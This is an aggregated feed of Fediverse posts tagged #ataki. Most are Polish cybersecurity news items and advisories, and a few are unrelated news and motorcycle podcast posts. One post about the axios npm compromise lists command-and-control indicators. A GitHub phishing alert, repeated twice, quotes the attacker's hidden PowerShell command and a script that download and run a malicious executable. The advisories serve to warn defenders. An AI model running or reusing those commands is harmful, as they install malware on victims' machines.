#ataki — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #ataki, aggregated by home.social.
-
https://www.europesays.com/pl/450503/ Izrael atakuje Liban, mimo zawieszenia broni. Szokująca relacja franciszkanina #ataki #BiskiWschód #BreakingNews #BreakingNews #cywile #dorzeczy #franciszkanie #Headlines #izrael #LatestNews #LatestNews #liban #Nagłówki #NajważniejszeArtykuły #News #Opinie #Polish #Polski #relacja #religia #swiat #TopStories #TopStories #Wiadomości #wojna #World #WorldNews #WorldNews #zakonnicy #ZawieszenieBroni #zbrodnie
-
https://www.europesays.com/pl/353630/ CERT Polska podsumowuje rekordowy 2025 rok. Co pokazuje raport? #2025 #atak #ataki #CERTPolska #cyberatak #cyberataki #cyberbezpieczenstwo #dane #nask #PL #Poland #Polish #Polska #Polski #raport
-
Poważny atak programistów. Popularna biblioteka axios była zainfekowana.
Oprogramowanie na twoim komputerze korzysta z Node’a? I masz w paczkę axiosa jako zależność? Rzuć wszystko i sprawdź z jakiej wersji korzystasz. Ktoś wstrzyknął do tej biblioteki złośliwy kod. Jeśli ją pobrałeś, Twój sprzęt i klucze chmurowe są w rękach przestępców.
Co się stało?
Właśnie odkryto kolejny poważny atak na łańcuch dostaw. Tym razem oberwała popularna biblioteka programistyczna axios powszechnie wykorzystywana do generowania żądań (pobierana ok. 100 milionów razy tygodniowo!). Tuż po północy atakujący przejęli kontrolę nad kontem npm twórcy biblioteki axios (jasonsaayman) i opublikowali dwie złośliwe wersje, omijając pipeline CI/CD oparty o GitHub Actions i OIDC (Trusted Publisher). Skorzystali po prostu z ręcznej publikacji z pomocą wykradzionego developerowi długoterminowego tokenu dostępu:
1.14.1 (31 marca o 00:21 UTC, tag latest)
0.30.4 (31 marca 01:00 UTCtag legacy)
Zachowanie wstrzykniętego złośliwego kodu różni się między systemami:Windows: Nadpisuje i chowa się pod fałszywym plikiem Windows Terminal (%PROGRAMDATA%\wt.exe), po czym odpala złośliwego PowerShella. (np. %TEMP%\6202033.ps1, %TEMP%\6202033.vbs)
macOS: Udaje demona systemowego, zrzucając plik do rzadko sprawdzanego katalogu /Library/Caches/com.apple.act.mond (plus pliki pod $TMPDIR/6202033).
Linux: Instaluje pythonowego backdoora w /tmp/ld.py.Malware łączy się z C2 pod adresem sfrclak[.]com:8000 i wysyła dane o Twoim środowisku, nasłuchuje poleceń oraz zaciera za sobą ślady usuwając pliki instalacyjne. Daje też atakującemu możliwość zdalnego wykonania kodu (RCE).
IoC:
IP Serwerów C2: 142.11.206[.]73
Domena kampanii C2 i URL: http://sfrclak[.]com:8000/6202033 oraz sfrclak[.]com (do odrzucenia na poziomie /etc/hosts / iptables)
Złośliwe [...] -
AirSnitch: “nowy atak na WiFi omijający szyfrowanie”.
Tego typu nagłówki mogą być trochę mylące (a pojawiają się już w zachodnich mediach). Zobaczmy wiec co właśnie ujawnili badaczo-hackerzy ;) Atak umożliwia podsłuch ruchu w sieci WiFi (atak Man in The Middle). Brzmi groźnie? No tak, ale: W badaniach ataki wykazywały się wysoką skutecznością – blisko 100% (tj. nie...
#WBiegu #Airsnitch #Ataki #Mitm #Podsłuch #Wifi
https://sekurak.pl/airsnitch-nowy-atak-na-wifi-omijajacy-szyfrowanie/
-
OpenAI wdraża Lockdown Mode. Czy to oznacza koniec ataków typu prompt injection?
Projektując aplikacje oparte o duże modele językowe (LLM) należy zapoznać się z OWASP TOP 10 for LLM. Jest to bezpośredni odpowiednik OWASP TOP 10 dla aplikacji webowych, zawierający listę najczęściej występujących podatności w aplikacjach korzystających z LLM. TLDR: Zgodnie z przewidywaniami, na pierwszym miejscu umieszczono Prompt Injection – zagrożenie, wynikające z...
#WBiegu #Ai #Ataki #Lockdown #Openai #PromptInjection
https://sekurak.pl/openai-wdraza-lockdown-mode-czy-to-oznacza-koniec-atakow-typu-prompt-injection/
-
https://www.europesays.com/pl/177130/ Atak trwa godziny, obrona dni. „Zmierzamy do destrukcji” #2025R. #2026 #2026R. #ai #AtakHakerski #ataki #AtakiRansomware #Biznes #Business #CoNasCzeka #CoNasCzeka2026 #cyberataki #cyberprzestępcy #CzegoSięSpodziewać #destrukcja #hakerzy #PL #Poland #Polish #Polska #Polski #ransomware #sabotaż #SztucznaInteligencja #TechnologiaAI
-
[AKTUALIZACJA] Przejęli mu konto, ale pomoc techniczna Google nie chce mu pomóc
Co może się stać, kiedy ktoś przejmie Wasze konto Google? Dużo. Strasznych. Rzeczy. Czy można takie konto odzyskać? Niby można, ale przypadek Mateusza pokazuje, że …nie można. I to pomimo nawiązania kontaktu z pomocą techniczną Google i pomimo posiadania wielu dowodów na to, że przejęte konto do Mateusza należy.
Oto jedna z najbardziej kuriozalnych historii, jaką ostatnio widzieliśmy. Istny cyfrowy paragraf 22. Zobaczcie jak Mateusz wpadł w czarną dziurę i uświadomcie sobie, jak niewiele znaczycie dla firm takich jak Google, pomimo tego, że przez lata płacicie im za różne usługi. Artykuł doczytajcie do końca, tam informujemy co warto zrobić, aby nie ponieść takich strat, jakie poniósł Mateusz w wyniku pewnej luki w procesach Google.
Kolega podesłał mi linka, w którego kliknąłem…
Historia Mateusza zaczyna się 25 września, kiedy odzywa się do niego znajomy na Discordzie. Znajomy przesła mu linka do strony https://vampirk-beta.netlify[.]app a Mateusz pobiera z niej plik .exe (MD5: 1E7997DFEF983BE219D95A1842FEE298) myśląc że to gra o której rozmawiają. I “grę” tę uruchamia. A robi to dlatego, że pracuje w branży gier komputerowych i takie prośby od znajomych nie były dla niego niczym niecodziennym.Problem w tym, że konto znajomego, który do Mateusza napisał zostało wcześniej przejęte przez atakującego, a pobrana gra okazała się trojanem…
Efekt? Atakujący przejmuje konta Mateusza, zarówno to na Discordzie jak również inne — w tym niestety konto Google. Ale najwyraźniej kradnie tylko ciasteczka i samo “wejście w sesję Mateusza” nie daje mu możliwości przejęcia pełnej kontroli nad kontem zapewne przez brak hasła, więc robi coś bardzo sprytnego:
Włamywacz prosi mnie [...]#Ataki #Discord #GMail #Google #Malware #PomocTechniczna #Stealer #Support
https://niebezpiecznik.pl/post/przejete-konto-google-gmail-jak-odzyskac-pomoc-suport-kontakt/
-
Ostrzeżenie przed globalną, chińską kampanią cyberszpiegowską
NSA wraz z agencjami ds. cyberbezpieczeństwa z 18 państw, w tym Agencją Wywiadu i SKW, wydała ostrzeżenie dotyczące kampanii cyber-szpiegowskiej prowadzonej przez chińskie podmioty, której celem jest krytyczna infrastruktura na całym świecie.
https://wp.me/p3fv0T-hEZ #Chiny #ChRL #USA #Polska #ostrzeżenie #cyberbezpieczeństwo #ataki #infrastruktura #telekomunikacja #POLECANE
-
Квадроцикл «Kayo AU 300 EFI». Мотоэнциклопедия на MOTORADIO. ► Подкаст программы: https://podcasts.apple.com/ru/podcast/id1288506147?i=1000715428380
⏤⏤⏤⏤⏤⏤⏤
Бренды, марки, модели, азбука мотоциклиста. В этом выпуске: квадрицикл «Kayo AU 300 EFI» (https://tinyurl.com/3pncrk7f ). Автор и ведущий рубрики - эксперт мотосалона Алексей Котлицкий. При участии специалистов мотоцентра «Роллинг Мото Санкт-Петербург» на Богатырском проспекте / www.rollingmoto.ru #роллингмото #rollingmoto #zontes #cyclone #groza, #kayo #ataki #мотосалон #motoradio -
Культовый питбайк «Kayo ТТ 125» в рубрике «Мотоэнциклопедия» на MOTORADIO. ► Подкаст программы: https://podcasts.apple.com/ru/podcast/id1288506147?i=1000714498731
⏤⏤⏤⏤⏤⏤⏤
Бренды, марки, модели, азбука мотоциклиста. В этом выпуске: питбайк «Kayo ТТ 125». Записано при участии специалистов мотоцентра «Роллинг Мото Санкт-Петербург» на Богатырском проспекте. Вебсайт: www.rollingmoto.ru Автор и ведущая рубрики - эксперт мотосалона, Алина Бородина. #роллингмото #rollingmoto #zontes #cyclone #groza, #kayo #ataki #мотосалон #motoradio -
Masz router Asusa? Sprawdź czy nie została wydana aktualizacja
Firma GreyNoise (wykorzystując AI) natrafiła na aktywną kampanię nieznanej grupy cyberprzestępców, która wykorzystuje kilka podatności do przejęcia kontroli nad routerami firmy Asus. Kampania śledzona jest pod nazwą ViciousTrap. Wśród wykorzystywanych luk możemy znaleźć, załataną niedawno podatność CVE-2023-39780 czyli command injection, która pozwala na wykonywanie poleceń systemowych. Oprócz tego, w atakach,...
#WBiegu #Apt #Asus #Ataki #Cve #Iot #Router
https://sekurak.pl/masz-router-asusa-sprawdz-czy-nie-zostala-wydana-aktualizacja/
-
Szwajcaria wprowadza nowe prawo dotyczące zgłaszania cyberataków
Szwajcaria postanowiła nie zostawać w tyle za innymi państwami, które już wprowadziły lub wprowadzają właśnie nowe regulacje dotyczące cyberbezpieczeństwa. 1 kwietnia na szwajcarskie firmy został nałożony nowy obowiązek informowania o cyberatakach w konkretnym czasie od wykrycia zdarzenia. W Szwajcarii w 2023 roku przyjęto nowelizację Information Security Act (ISA), która weszła...
#WBiegu #Ataki #Awareness #Cyberawareness #Prawo #Przepisy #Szwajcaria
https://sekurak.pl/szwajcaria-wprowadza-nowe-prawo-dotyczace-zglaszania-cyberatakow/
-
Jak wygląda cyberbezpieczeństwo w dużym banku? I jak takie banki reagują na ataki?
Większość z Was trzyma swoje oszczędności w bankach. I nigdy ich nie straciliście z powodu ataku na bank. To jednak nie oznacza, że takich ataków nie ma. Są, ale banki to jedne z najbardziej dojrzałych i uregulowanych pod kątem cyberbezpieczeństwa instytucji. Co banki dokładnie robią, aby nie zostać zhackowanymi? Jakie incydenty się im zdarzają i jak je obsługują?
Tego dowiecie się już w piątek, 17 stycznia, o godzinie 20:00 na LIVE, na którym porozmawiamy z Tomaszem Lapajem i Dariuszem Jurkiewiczem, ekspertami dbającymi o cyberbezpieczeństwo w banku HSBC. Oto link do spotkania:Transmisja potrwa ok. godzinę + sesja pytań i odpowiedzi. Już teraz kliknijcie na powyższy link, a potem na dzwoneczek, aby otrzymać powiadomienie od YouTube o starcie lajwa. Spotkanie będziemy też streamować na Facebooku i LinkedIn, ale zapraszamy Was przede wszystkim na YouTube, bo tam aktywny będzie czat, dzięki czemu będziecie mogli naszym gościom zadawać swoje pytania.
Możecie też wpisać swój e-mail w formularzu poniżej, wtedy otrzymacie od nas przypomnienie o transmisji e-mailem, ~15 minut przed startem:Wpisz adres e-mail:
Rozwiąż Captcha:
HP
Bez obaw, podanych e-maili nikomu nie przekazujemy i wykorzystamy je wyłącznie do przypominania Ci o naszych wydarzeniach. Jeśli lubisz czytać o RODO, kliknij tutaj.
O czym będzie?
Tomek i Dariusz opowiedzą m.in. o:Tym jak wygląda praca w bankowym SOC-u?
Jak banki dowiadują się o incydentach i jak wygląda proces incident response?
Które z ataków obserwują najcześciej i które z nich są “najstraszniejsze”?
Co trzeba umieć, aby dostać robotę w którymś z bankowych zespołów cyberbezpieczeństwa, czy warto inwestować w branżowe certyfikaty?
Co banki robią, aby wyeliminować ryzyko związane ze “zbuntowanym [...]#Ataki #Banki #HSBC #NIST #PSD2
https://niebezpiecznik.pl/post/cyberbezpieczenstwo-duze-banki/
-
Jak Mosad zdetonował elektronikę Hezbollahu?
Czwarty odcinek “Piotrek o Cyber”, czyli cotygodniowego przeglądu naj(ważniejszych|ciekawszych) wydarzeń z cyberbezpieczeństwa jest już gotowy do obejrzenia na niebezpiecznikowym kanale na YouTube.
Tematem przewodnim jest opis i analiza operacji izraelskich służb wymierzonej w Hezbollah. Ale parę słów poświęciłem też na analizę algorytmu YouTuba w kontekście filmów monetyzowanych i niemonetyzowanych (eksperyment trwa, a ten odcinek ma 10x zasięg) oraz atak na zdalne hakowanie rowerów z najnowszymi przerzutkami (tak, rowerów). Jest też silny dowód na to, jak faktycznie będzie wyglądało mordowanie ludzi przez AI (spoiler: nie będzie tak spektakularne jak Wam się wydaje). Oto link do nagrania, gdyby okienko z podglądem nie pojawiło się poniżej:Artykuł konczę staroyotubowym: “zasubskrybujcie kanał“, żeby nie przegapić kolejnych odcinków! A poprzednie 3 przeglądy znajdziecie tutaj. Tak, to już miesiąc. Nie sądziłem, że tak długo wytrzymam.
#AI #Ataki #Żydzi #Hezbollah #Izrael #Krótkofalarstwo #Liban #Mosad #Pager #PiotrekOCyber #Rowery #Wybuch
https://niebezpiecznik.pl/post/jak-mosad-zdetonowal-elektronike-hezbollahu/
-
Jak Mosad zdetonował elektronikę Hezbollahu?
Czwarty odcinek “Piotrek o Cyber”, czyli cotygodniowego przeglądu naj(ważniejszych|ciekawszych) wydarzeń z cyberbezpieczeństwa jest już gotowy do obejrzenia na niebezpiecznikowym kanale na YouTube.
Tematem przewodnim jest opis i analiza operacji izraelskich służb wymierzonej w Hezbollah. Ale parę słów poświęciłem też na analizę algorytmu YouTuba w kontekście filmów monetyzowanych i niemonetyzowanych (eksperyment trwa, a ten odcinek ma 10x zasięg) oraz atak na zdalne hakowanie rowerów z najnowszymi przerzutkami (tak, rowerów). Jest też silny dowód na to, jak faktycznie będzie wyglądało mordowanie ludzi przez AI (spoiler: nie będzie tak spektakularne jak Wam się wydaje). Oto link do nagrania, gdyby okienko z podglądem nie pojawiło się poniżej:Artykuł konczę staroyotubowym: “zasubskrybujcie kanał“, żeby nie przegapić kolejnych odcinków! A poprzednie 3 przeglądy znajdziecie tutaj. Tak, to już miesiąc. Nie sądziłem, że tak długo wytrzymam.
#AI #Ataki #Żydzi #Hezbollah #Izrael #Krótkofalarstwo #Liban #Mosad #Pager #PiotrekOCyber #Rowery #Wybuch
https://niebezpiecznik.pl/post/jak-mosad-zdetonowal-elektronike-hezbollahu/
-
Uwaga programiści! Ktoś wysyła cwane komunikaty przez GitHuba
Jak informują nas programiści posiadający konto na GitHubie, od wczoraj otrzymują powiadomienia o następującej treści:
fot. przesłana prze z Jana
Hey there!
We have detected a security vulnerability in your repository. Please contact us at https://github-scanner[.]com to get more information on how to fix this issue.
Best regards,
Github Security Team
Powiadomienia są triggerowane przez dodanie (a następnie usunięcie) tzw. “issue” do projektu. Gdzie prowadzi link? Ano do strony, która próbuje na programiście wykonać atak “na CAPTCHA” opisywany przez nas ponad 2 tygodnie temu w ramach CyberAlertu. Ofiara widzi to:Kliknięcie w przycisk na pierwszym ekranie kopiuje do schowka ofiary następującą komendę:
powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner[.]com/download.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: XXXXXX"
A zastosowanie się do instrukcji widocznej na kolejnym ekranie uruchamia powyższą komendę, czyli w konsekwencji następujący kod infekujący komputer ofiary złośliwym oprogramowaniem:
$webClient = New-Object System.Net.WebClient
$url1 = "https://github-scanner[.]com/l6E.exe"
$filePath1 = "$env:TEMP\SysSetup.exe"
$webClient.DownloadFile($url1, $filePath1)
Start-Process -FilePath $env:TEMP\SysSetup.exe
Szczerze mówiąc, trochę nas dziwi dobór ofiar. Programiści akurat są świadomi, co robi skrót WIN+R. Z drugiej jednak strony, zainfekować programistę popularnego projektu na GitHubie to jak wygrać w totka…
Na jakie jeszcze ataki powinni uważać programiści?
Jeśli chcesz poznać wszystkie ataki, na które powinni być wyczuleni programiści aplikacji webowych, to wpadnij na nasze szkolenie z “Atakowanie i Ochrony Webaplikacji”. To dwa dni pełne praktyki [...]#Ataki #Captcha #GitHub #Malware #Phishing #Programista #Programowanie #Socjotechnika
https://niebezpiecznik.pl/post/uwaga-programisci-ktos-wysyla-cwane-komunikaty-przez-githuba/
-
Uwaga programiści! Ktoś wysyła cwane komunikaty przez GitHuba
Jak informują nas programiści posiadający konto na GitHubie, od wczoraj otrzymują powiadomienia o następującej treści:
fot. przesłana prze z Jana
Hey there!
We have detected a security vulnerability in your repository. Please contact us at https://github-scanner[.]com to get more information on how to fix this issue.
Best regards,
Github Security Team
Powiadomienia są triggerowane przez dodanie (a następnie usunięcie) tzw. “issue” do projektu. Gdzie prowadzi link? Ano do strony, która próbuje na programiście wykonać atak “na CAPTCHA” opisywany przez nas ponad 2 tygodnie temu w ramach CyberAlertu. Ofiara widzi to:Kliknięcie w przycisk na pierwszym ekranie kopiuje do schowka ofiary następującą komendę:
powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner[.]com/download.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: XXXXXX"
A zastosowanie się do instrukcji widocznej na kolejnym ekranie uruchamia powyższą komendę, czyli w konsekwencji następujący kod infekujący komputer ofiary złośliwym oprogramowaniem:
$webClient = New-Object System.Net.WebClient
$url1 = "https://github-scanner[.]com/l6E.exe"
$filePath1 = "$env:TEMP\SysSetup.exe"
$webClient.DownloadFile($url1, $filePath1)
Start-Process -FilePath $env:TEMP\SysSetup.exe
Szczerze mówiąc, trochę nas dziwi dobór ofiar. Programiści akurat są świadomi, co robi skrót WIN+R. Z drugiej jednak strony, zainfekować programistę popularnego projektu na GitHubie to jak wygrać w totka…
Na jakie jeszcze ataki powinni uważać programiści?
Jeśli chcesz poznać wszystkie ataki, na które powinni być wyczuleni programiści aplikacji webowych, to wpadnij na nasze szkolenie z “Atakowanie i Ochrony Webaplikacji”. To dwa dni pełne praktyki [...]#Ataki #Captcha #GitHub #Malware #Phishing #Programista #Programowanie #Socjotechnika
https://niebezpiecznik.pl/post/uwaga-programisci-ktos-wysyla-cwane-komunikaty-przez-githuba/